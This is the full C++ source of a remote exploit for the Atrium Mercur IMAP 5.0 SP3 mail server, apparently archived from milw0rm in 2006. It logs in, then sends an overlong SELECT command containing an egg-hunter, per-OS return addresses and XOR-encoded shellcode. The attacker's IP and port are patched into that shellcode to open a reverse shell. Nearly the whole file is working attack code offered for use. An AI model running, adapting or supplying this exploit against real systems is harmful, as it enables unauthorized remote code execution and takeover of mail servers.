/* * mercur.cpp * * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit * Copyright (C) 2006 Javaphile Group * http://www.javaphile.org * * Exploits code by : pll Ellison.Tang[at]gmail[dot]com * * Bug Reference: * http://www.frsirt.com/bulletins/4332 * */ #include #include #include #include #pragma comment(lib, "ws2_32") SOCKET ConnectTo(char *ip, int port) { WSADATA wsaData; SOCKET s; struct hostent *he; struct sockaddr_in host; int nTimeout=150000; if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0) { printf("[-]WSAStartup failed.\n"); exit(-1); } if((he=gethostbyname(ip))==0) { printf("[-]Failed to resolve '%s'.", ip); exit(-1); } host.sin_port=htons(port); host.sin_family=AF_INET; host.sin_addr=*((struct in_addr *)he->h_addr); if ((s=socket(AF_INET,SOCK_STREAM,0))<0) { printf("[-]Failed creating socket."); exit(-1); } if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1) { closesocket(s); printf("[-]Failed connecting to host.\n"); exit(-1); } setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout)); return s; } void Disconnect(SOCKET s) { closesocket(s); WSACleanup(); } void PrintSc(unsigned char *sc, int len) { int i,j; char *p; char msg[6]; //printf("/* %d bytes */\n", buffsize); // Print general shellcode for(i = 0; i < len; i++) { if((i%16)==0) { if(i!=0) printf("\"\n\""); else printf("\""); } //printf("\\x%.2X", sc[i]); sprintf(msg, "\\x%.2X", sc[i] & 0xff); for( p = msg, j=0; j < 4; p++, j++ ) { if(isupper(*p)) printf("%c", _tolower(*p)); else printf("%c", p[0]); } } printf("\";\n"); } void main(int argc,char* argv[]) { struct OSTYPE { unsigned int ret; char des[255]; }; OSTYPE os[] = { {0x7FFA4512, "CN Windows ALL 0x7FFA4512"}, {0x7801f4fb, "Windows 2k SP4 0x7801f4fb"}, {0xDDDDDDDD, "Debug"}, {0, NULL} }; unsigned char shellcode[]= /* ip offset: 71 + 21 = 92 */ /* port offset: 78 + 21 = 99 */ /* 21 bytes decode */ "\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05" "\xe8\xed\xff\xff\xff" /* 254 bytes shellcode, xor with 0xee */ "\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65" "\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee" "\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b" "\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef" "\x84\xec\x11\xb8\xfe\x7d\x86" "\x91\xee\xee\xef" //ip "\x86" "\xec\xee" "\xee\xdb" //port "\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84" "\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45" "\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf" "\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11" "\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0" "\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b" "\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05" "\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65" "\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11" "\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37" "\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97"; unsigned char FindSc[]= "\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B" "\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50" "\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74" "\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7" "\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01" "\x04\x13\x33\xC0\xC3" "\x90\x90\x90\x90" "\xEB\xA5"; if(argc < 5) { printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n"); printf("-------------------------------------------\n"); printf("Usage:\n"); printf(" %s \n", argv[0]); printf("\nType could be:\n"); int i=0; while(os[i].ret) { printf(" [%d] %s\n", i, os[i].des); i++; } return; } SOCKET s=ConnectTo(argv[1],143); printf("[+]Connected to target..."); char szRecvBuff[600] = {0}; if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0) { printf("failed!\n"); return; } else { printf("done!\n"); } // printf("%s\n",szRecvBuff); if(strstr(szRecvBuff, "MERCUR") == NULL) { printf("[-]Seems not IMAP running.\n"); printf("Quiting..."); return; } else { printf("[*]Seems IMAP running.\n"); } unsigned long dwCbIp=inet_addr(argv[2]); unsigned short q=(unsigned short)atoi(argv[3]); unsigned short dwCbPort=(unsigned short)q; dwCbIp=dwCbIp^0xEEEEEEEE; dwCbPort=dwCbPort^0xEEEE; shellcode[92] =(char) (dwCbIp & 0x000000FF); shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8); shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16); shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24); shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8); shellcode[100] =(char) (dwCbPort & 0x000000FF); char szUserName[20]={0}; printf("[?]Username:"); gets(szUserName); char szPassWord[20]={0}; printf("[?]Passwd:"); gets(szPassWord); char szLogin[]=" login "; char szLoginInfo[50]={0}; unsigned char szSpace=0x20; char szEnd[]="\r\n"; memcpy(szLoginInfo,szUserName,lstrlen(szUserName)); int dwLen=lstrlen(szUserName); memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin)); dwLen+=lstrlen(szLogin); memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord)); dwLen+=lstrlen(szPassWord); memcpy(szLoginInfo+dwLen,&szSpace,1); dwLen++; memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord)); dwLen+=lstrlen(szPassWord); memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd)); // printf("%s\n",szLoginInfo); printf("[+]Sending Login Info..."); send(s,szLoginInfo,lstrlen(szLoginInfo),0); if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0) { printf("failed!\n"); return; } else { printf("done!\n"); } // printf("%s\n",szRecvBuff); if(strstr(szRecvBuff, "OK") == NULL) { printf("[-]Seems not a valid user or not support IMAP.\n"); printf("Quiting..."); return; } else { printf("[*]Seems a valid user.\n"); } char szSelect[]=" select "; char szMagicData[1000]={0}; memset(szMagicData,'A',sizeof(szMagicData)-1); memcpy(szMagicData,szUserName,lstrlen(szUserName)); memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1); int p=atoi(argv[4]); *(unsigned int *)&FindSc[85] = os[p].ret; memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1); memcpy(szMagicData+251,szEnd,sizeof szEnd-1); char szAdog[]="AGOU"; memcpy(szMagicData+253,szAdog,sizeof szAdog-1); memcpy(szMagicData+257,szAdog,sizeof szAdog-1); memcpy(szMagicData+261,shellcode,sizeof shellcode-1); memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1); printf("[+]Sending Magic Data To server...Good Luck!\n"); send(s,szMagicData,sizeof szMagicData-1,0); recv(s,szRecvBuff,sizeof(szRecvBuff),0); printf("%s\n",szRecvBuff); Disconnect(s); printf("[?]Sending finished...Good luck!\n"); } // milw0rm.com [2006-03-19]